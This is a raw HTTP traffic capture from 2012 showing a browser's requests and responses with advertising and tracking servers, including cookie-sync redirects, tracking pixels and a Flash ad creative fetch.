P3P: CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Set-Cookie: uuid=50a9b2e2-9d68-d676-6901-3c5fafca2592; domain=.mathtag.com; path=/; expires=Tue, 19-Nov-2013 04:17:38 GMT
Location: http://sync.mathtag.com/sync/img?mt_exid=11&amp;type=sync&amp;redir=http%3A%2F%2Fbh.contextweb.com%2Fbh%2Frtset%3Fdo%3Dadd%26pid%3D530739%26ev%3D%5BMM_UUID%5D&amp;mm_bnc
GET /uploaded_creatives/39e4e6a79f69632c77c5dbdfed52718c2e667745.swf?clickTAG=http%3A%2F%2Feeu.pixel.prod2.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26b%3Drh250.ovq.wiz.cebq2%26message%3DeJwNzDEOwzAMA8C_cLYBW5IjQmsLfaaBOwUZgv69GrgcSD6YCKS5OfPdyZnd1LJTdfSKSLpSxwsNC7GWaYMjpKrSIAhvOBDTDlqBlkyuQZZrfV_7s7_3rrkh9nWexeV0yvz9AZ.vG8Y-%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DtG8AALVvAAArXwAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAACwBAAD6AAAACQAAAAAAAAACAAAAQ0M3OEFDQTgtOTM1My00M0FGLUIzNDYtNkRFNDdBQ0NGRDA2AAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAAAAAAAAAAAAD%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_url%253Dhttp%25253A%25252F%25252Fwww.porsgrundbad.no%25252Fsmart%25253Futm_source%25253DNB-AdExchange%252526utm_medium%25253Dcpm%252526utm_content%25253Dnorja%252526utm_campaign%25253DNB-smart HTTP/1.1

Host: cdn.invitemedia.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://eeu.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=tG8AALVvAAArXwAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAACwBAAD6AAAACQAAAAAAAAACAAAAQ0M3OEFDQTgtOTM1My00M0FGLUIzNDYtNkRFNDdBQ0NGRDA2AAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAAAAAAAAAAAAD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_url=&amp;cost=0.4377&amp;creative_id=371685&amp;zip_code=unknown&amp;referrer_url=http%253A%252F%252Fwww.88websitedesign.com%252Findex.php&amp;exch_id=7&amp;line_item_id=1850887&amp;b=rh250.ovq.wiz.cebq2&amp;source_url=http%3A%2F%2Fwww.yardbarker.com&amp;auction_id=F47478FD-881F-434F-8330-33022F73830C&amp;us_id=5543&amp;invite_uid=db273952-68a4-4097-8df2-7d98b16e5711&amp;pub_line_item_id=87821&amp;mapped_uid=7-CC78ACA8-9353-43AF-B346-6DE47ACCFD06&amp;inv_size_id=146842&amp;campaign_id=252144&amp;p_us_id=28812
HTTP/1.0 200 OK

Content-Type: application/x-shockwave-flash
Content-Length: 37696
Connection: keep-alive
x-amz-id-2: Ppot6RswbCV7gYYeN4BLop8bIblu4ob3Gf+aL/QA+VBjy2FZFtZ0WlU3tmnKHFwj
x-amz-request-id: 408A2EA081F71270
Date: Wed, 17 Oct 2012 13:27:20 GMT
Last-Modified: Wed, 17 Oct 2012 13:24:45 GMT
Etag: &quot;9f2f64c5eede5090336e4911e38fcca9&quot;
Accept-Ranges: bytes
Server: AmazonS3
Age: 35986
X-Amz-Cf-Id: 8uFZ9kR_fTkTCqrfL62xHrbnUSqHgBMhp7VfClnaZfYZNGrkpQQikw==
Via: 1.0 3fe63ad2ae5f5b8c327f7cf3001228e0.cloudfront.net (CloudFront)
X-Cache: Hit from cloudfront
GET /data_sync?partner_id=230&exchange_id=8 HTTP/1.1

Host: pixel.invitemedia.com
GET /data_sync?partner_id=230&amp;exchange_id=8 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://eeu.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=tG8AALVvAAArXwAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAACwBAAD6AAAACQAAAAAAAAACAAAAQ0M3OEFDQTgtOTM1My00M0FGLUIzNDYtNkRFNDdBQ0NGRDA2AAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAAAAAAAAAAAAD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_url=&amp;cost=0.4377&amp;creative_id=371685&amp;zip_code=unknown&amp;referrer_url=http%253A%252F%252Fwww.88websitedesign.com%252Findex.php&amp;exch_id=7&amp;line_item_id=1850887&amp;b=rh250.ovq.wiz.cebq2&amp;source_url=http%3A%2F%2Fwww.yardbarker.com&amp;auction_id=F47478FD-881F-434F-8330-33022F73830C&amp;us_id=5543&amp;invite_uid=db273952-68a4-4097-8df2-7d98b16e5711&amp;pub_line_item_id=87821&amp;mapped_uid=7-CC78ACA8-9353-43AF-B346-6DE47ACCFD06&amp;inv_size_id=146842&amp;campaign_id=252144&amp;p_us_id=28812
Cookie: uid=db273952-68a4-4097-8df2-7d98b16e5711
HTTP/1.1 200 OK

Content-Type: text/html
Date: Mon, 19 Nov 2012 04:17:38 GMT
Set-Cookie: dp_rec=&quot;{\&quot;4\&quot;:1353298658}&quot;;Version=1;Path=/;Domain=invitemedia.com;Expires=Tue, 19-Nov-2013 04:17:38 GMT;Max-Age=31536000 impressions=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT clicks=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT segments=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT io_frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC&quot;
Cache-Control: no-cache
Content-Length: 590
Connection: close
Server: Jetty(7.3.1.v20110307)
GET /sync/img?mt_exid=11&type=sync&redir=http%3A%2F%2Fbh.contextweb.com%2Fbh%2Frtset%3Fdo%3Dadd%26pid%3D530739%26ev%3D%5BMM_UUID%5D&mm_bnc HTTP/1.1

Host: sync.mathtag.com
GET /sync/img?mt_exid=11&amp;type=sync&amp;redir=http%3A%2F%2Fbh.contextweb.com%2Fbh%2Frtset%3Fdo%3Dadd%26pid%3D530739%26ev%3D%5BMM_UUID%5D&amp;mm_bnc HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: uuid=50a9b2e2-9d68-d676-6901-3c5fafca2592
HTTP/1.1 302 Found

Content-Type: image/gif
Date: Mon, 19 Nov 2012 04:17:38 GMT
Content-Length: 0
Connection: keep-alive
Server: mt2/2.6.2.2465 Sep 24 2012 22:21:34 zrh-pixel-x5 pid 0x1080 4224
Cache-Control: no-cache
P3P: CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Set-Cookie: mt_mop=11:1353298658; domain=.mathtag.com; path=/; expires=Wed, 19-Dec-2012 04:17:38 GMT
Location: http://bh.contextweb.com/bh/rtset?do=add&amp;pid=530739&amp;ev=50a9b2e2-9d68-d676-6901-3c5fafca2592
GET /ptj?member=514&size=160x600&referrer=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&inv_code=653070&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D160x600%26s%3D653070%26r%3D0%26_salt%3D1488817%26u%3Dhttp%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252FBackupTags%252F520266%252F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html%26u%3Dhttp%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html HTTP/1.1

Host: ib.adnxs.com
GET /ptj?member=514&amp;size=160x600&amp;referrer=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&amp;inv_code=653070&amp;redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D160x600%26s%3D653070%26r%3D0%26_salt%3D1488817%26u%3Dhttp%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252FBackupTags%252F520266%252F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html%26u%3Dhttp%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FQUoEhxBTqzB-6V-ZbE(Q-FbEN!/vP[bh#%'@AF; sess=1; icu=ChII4LcDEAoYASABKAEw4eWmhQUQ4eWmhQUYAA..
HTTP/1.1 200 OK

Content-Type: text/javascript
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Sun, 17-Feb-2013 04:17:38 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Tue, 20-Nov-2012 04:17:38 GMT; domain=.adnxs.com; HttpOnly icu=ChII4LcDEAoYASABKAEw4eWmhQUKEgjrhgQQChgBIAEoATDi5aaFBRDi5aaFBRgB; path=/; expires=Sun, 17-Feb-2013 04:17:38 GMT; domain=.adnxs.com; HttpOnly acb141525=![nC'XI()vG)#E&lt;0nf8M-odmF?enc=AAAAAAAA4D8zMzMzMzPbPwAAAAAAAOA_MzMzMzMz2z8AAAAAAADgP0Z8MTD2gf9soArzhH1cTlHisqlQAAAAAKyWCAACAgAANQEAAAIAAAALpjYA51gBAAAAAQBVU0QAVVNEAKAAWAIHXAAA2k8BAgUCAQUAAAAAPRohpgAAAAA.&amp;tt_code=653070&amp;cnd=%21Mx-g3QiC7CQQi8zaARgAIOexBTAAOIe4AUAASLUCUKytIlgAYNgGaABwpAF4OoABihSIATqQAQGYAQGgAQGoAQOwAQC5AQAAAAAAAOA_wQEAAAAAAADgP8kBmpmZmZmZuT_ZAQAAAAAAAPA_4AEA&amp;udj=uf%28%27a%27%2C+40624%2C+1353298658%29%3Buf%28%27r%27%2C+3581451%2C+1353298658%29%3Bppv%2827656%2C+%277854139169527921734%27%2C+1353298658%2C+1353557858%2C+603650%2C+88295%2C+0%2C+0%2C+604800%29%3B&amp;ccd=%21sgWWMQiC7CQQi8zaARjnsQUgAA..&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1; path=/; expires=Tue, 20-Nov-2012 04:17:38 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG68%Cxrx)0s]#%2L_'x%SEV/hnJPh4FQUoEhxBTqzB-6V-ZbE(V4S@'0FP`9QQoY]&gt;5y9nKjKn-qjm'; path=/; expires=Sun, 17-Feb-2013 04:17:38 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 19 Nov 2012 04:17:38 GMT
Content-Length: 577
GET /pubm_imp?returnType=image&key=AdImp&cost=437700&creativeID=371685&message=eJwNzDEOwzAMA8C_cLYBW5IjQmsLfaaBOwUZgv69GrgcSD6YCKS5OfPdyZnd1LJTdfSKSLpSxwsNC7GWaYMjpKrSIAhvOBDTDlqBlkyuQZZrfV_7s7_3rrkh9nWexeV0yvz9AZ.vG8Y-&managed=false&b=rh250.ovq.wiz.cebq2 HTTP/1.1

Host: eeu.pixel.prod2.invitemedia.com
GET /pubm_imp?returnType=image&amp;key=AdImp&amp;cost=437700&amp;creativeID=371685&amp;message=eJwNzDEOwzAMA8C_cLYBW5IjQmsLfaaBOwUZgv69GrgcSD6YCKS5OfPdyZnd1LJTdfSKSLpSxwsNC7GWaYMjpKrSIAhvOBDTDlqBlkyuQZZrfV_7s7_3rrkh9nWexeV0yvz9AZ.vG8Y-&amp;managed=false&amp;b=rh250.ovq.wiz.cebq2 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://eeu.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=tG8AALVvAAArXwAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAACwBAAD6AAAACQAAAAAAAAACAAAAQ0M3OEFDQTgtOTM1My00M0FGLUIzNDYtNkRFNDdBQ0NGRDA2AAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAAAAAAAAAAAAD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_url=&amp;cost=0.4377&amp;creative_id=371685&amp;zip_code=unknown&amp;referrer_url=http%253A%252F%252Fwww.88websitedesign.com%252Findex.php&amp;exch_id=7&amp;line_item_id=1850887&amp;b=rh250.ovq.wiz.cebq2&amp;source_url=http%3A%2F%2Fwww.yardbarker.com&amp;auction_id=F47478FD-881F-434F-8330-33022F73830C&amp;us_id=5543&amp;invite_uid=db273952-68a4-4097-8df2-7d98b16e5711&amp;pub_line_item_id=87821&amp;mapped_uid=7-CC78ACA8-9353-43AF-B346-6DE47ACCFD06&amp;inv_size_id=146842&amp;campaign_id=252144&amp;p_us_id=28812
Cookie: uid=db273952-68a4-4097-8df2-7d98b16e5711
HTTP/1.1 302 Found

HTTP/1.1 302 Found
Date: Mon, 19 Nov 2012 04:17:41 GMT
Set-Cookie: camp_freq_p1=&quot;eJzjkuH4sJFfgFHi6dNlrawKjBpPO9a0showWoD5AKFUC1E=&quot;;Version=1;Path=/;Domain=invitemedia.com;Expires=Tue, 19-Nov-2013 04:17:41 GMT;Max-Age=31536000 impressions_p1=&quot;eJzjcuRgF1JxMzE3Mbdwc9G1sDB00zUxNnHTtTA2NtAFYiMjN3NjC2MDZ4mnT5e1siq0/ynQmPWbw6B3HavFcu2InoeMAA+dE2s=&quot;;Version=1;Path=/;Domain=invitemedia.com;Expires=Tue, 19-Nov-2013 04:17:41 GMT;Max-Age=31536000 io_freq_p1=&quot;eJzjkuF4eYtRgFHi6dNlrawKjBpPO9a0showWoD5AKNjC2U=&quot;;Version=1;Path=/;Domain=invitemedia.com;Expires=Tue, 19-Nov-2013 04:17:41 GMT;Max-Age=31536000 impressions=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT clicks=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT segments=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT io_frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC&quot;
Cache-Control: no-cache
Location: http://cm.g.doubleclick.net/pixel?google_sc&amp;google_nid=invitemedia&amp;google_cm&amp;google_hm=2yc5UmikQJeN8n2YsW5XEQ==
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)
GET /html/fullpage/js/date.js HTTP/1.1

Host: player.production.s3.amazonaws.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/x-javascript
x-amz-id-2: SffQanIert5u3lZTlxAAj8zQ0iJc7YGaPlo+IyQ/iukQM/ri5/4yzv+R6lCmhxds
x-amz-request-id: 76F22709EC2F1AD5
Date: Mon, 19 Nov 2012 04:17:39 GMT
x-amz-meta-cb-modifiedtime: Sat, 01 Sep 2012 13:22:28 GMT
Last-Modified: Sat, 08 Sep 2012 12:31:04 GMT
Etag: &quot;497166e7f447a56c7b279271c6c6e6c8&quot;
Accept-Ranges: bytes
Content-Length: 25809
Server: AmazonS3
GET /server/pixel.htm?fpid=12 HTTP/1.1

Host: ad.turn.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
HTTP/1.1 200 OK

Content-Type: text/html;charset=UTF-8
Server: Apache-Coyote/1.1
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV&quot;
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4608069794370173199; Domain=.turn.com; Expires=Sat, 18-May-2013 04:17:40 GMT; Path=/
Transfer-Encoding: chunked
Content-Encoding: gzip
Vary: Accept-Encoding
Date: Mon, 19 Nov 2012 04:17:40 GMT
GET /pixel?google_sc&google_nid=invitemedia&google_cm&google_hm=2yc5UmikQJeN8n2YsW5XEQ== HTTP/1.1

Host: cm.g.doubleclick.net
GET /pixel?google_sc&amp;google_nid=invitemedia&amp;google_cm&amp;google_hm=2yc5UmikQJeN8n2YsW5XEQ== HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://eeu.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=tG8AALVvAAArXwAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAACwBAAD6AAAACQAAAAAAAAACAAAAQ0M3OEFDQTgtOTM1My00M0FGLUIzNDYtNkRFNDdBQ0NGRDA2AAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAAAAAAAAAAAAD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_url=&amp;cost=0.4377&amp;creative_id=371685&amp;zip_code=unknown&amp;referrer_url=http%253A%252F%252Fwww.88websitedesign.com%252Findex.php&amp;exch_id=7&amp;line_item_id=1850887&amp;b=rh250.ovq.wiz.cebq2&amp;source_url=http%3A%2F%2Fwww.yardbarker.com&amp;auction_id=F47478FD-881F-434F-8330-33022F73830C&amp;us_id=5543&amp;invite_uid=db273952-68a4-4097-8df2-7d98b16e5711&amp;pub_line_item_id=87821&amp;mapped_uid=7-CC78ACA8-9353-43AF-B346-6DE47ACCFD06&amp;inv_size_id=146842&amp;campaign_id=252144&amp;p_us_id=28812
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 302 Found

Content-Type: text/html; charset=UTF-8
Location: http://g-pixel.invitemedia.com/gmatcher?google_gid=CAESEE5Cd4RhtyLOx5zauejuLUM&amp;google_cver=1
Date: Mon, 19 Nov 2012 04:17:40 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Server: Cookie Matcher
Content-Length: 293
X-XSS-Protection: 1; mode=block
GET /site/2748?rg=production_bua&redir=http%3A%2F%2Fsegment-pixel.invitemedia.com%2Fset_partner_uid%3FpartnerID%3D84%26partnerUID%3D%24_BK_UUID%26sscs_active%3D1 HTTP/1.1

Host: tags.bluekai.com
GET /site/2748?rg=production_bua&amp;redir=http%3A%2F%2Fsegment-pixel.invitemedia.com%2Fset_partner_uid%3FpartnerID%3D84%26partnerUID%3D%24_BK_UUID%26sscs_active%3D1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pixel.invitemedia.com/data_sync?partner_id=230&amp;exchange_id=8
Cookie: bkc=KJpM8sJQtem5QKcHooDOM9y1eJh94rkDPcTYsC2WydiOTQy1GRKRDwQ4+bc0lbwhRNQxIQsv2C88; bklc=50a9b2e2; bko=; bkp1=; bku=DHz99mv03PelwF+4; bkw5=; bkdc=snv
HTTP/1.1 302 Found

Content-Type: text/html
Date: Mon, 19 Nov 2012 04:17:40 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP=&quot;NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV&quot;, policyref=&quot;http://tags.bluekai.com/w3c/p3p.xml&quot;
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Location: http://segment-pixel.invitemedia.com/set_partner_uid?partnerID=84&amp;partnerUID=upEfUI6599OKrvkx&amp;sscs_active=1
Set-Cookie: bkc=KJpqyXU9LYrRiKcJooDOM9y1ecr94JjeeYMX5iPD4QynQLXJ8mIjpLeyY/k4mCVP7TesO2Wy439T96wG/uRDdL5+3wplSc0xdE9I9BUBn3X=; expires=Sat, 18-May-2013 04:17:40 GMT; path=/; domain=.bluekai.com bklc=50a9b2e4; expires=Sat, 18-May-2013 04:17:40 GMT; path=/; domain=.bluekai.com bkst=KJhMR5Mehze9pkYSk8tUU8fljBwv999+7xjh; expires=Sat, 18-May-2013 04:17:40 GMT; path=/; domain=.bluekai.com bkdc=snv; expires=Wed, 19-Dec-2012 04:17:40 GMT; path=/; domain=.bluekai.com
BK-Server: f207
Content-Length: 0
GET /bh/rtset?do=add&pid=530739&ev=50a9b2e2-9d68-d676-6901-3c5fafca2592 HTTP/1.1

Host: bh.contextweb.com
GET /bh/rtset?do=add&amp;pid=530739&amp;ev=50a9b2e2-9d68-d676-6901-3c5fafca2592 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
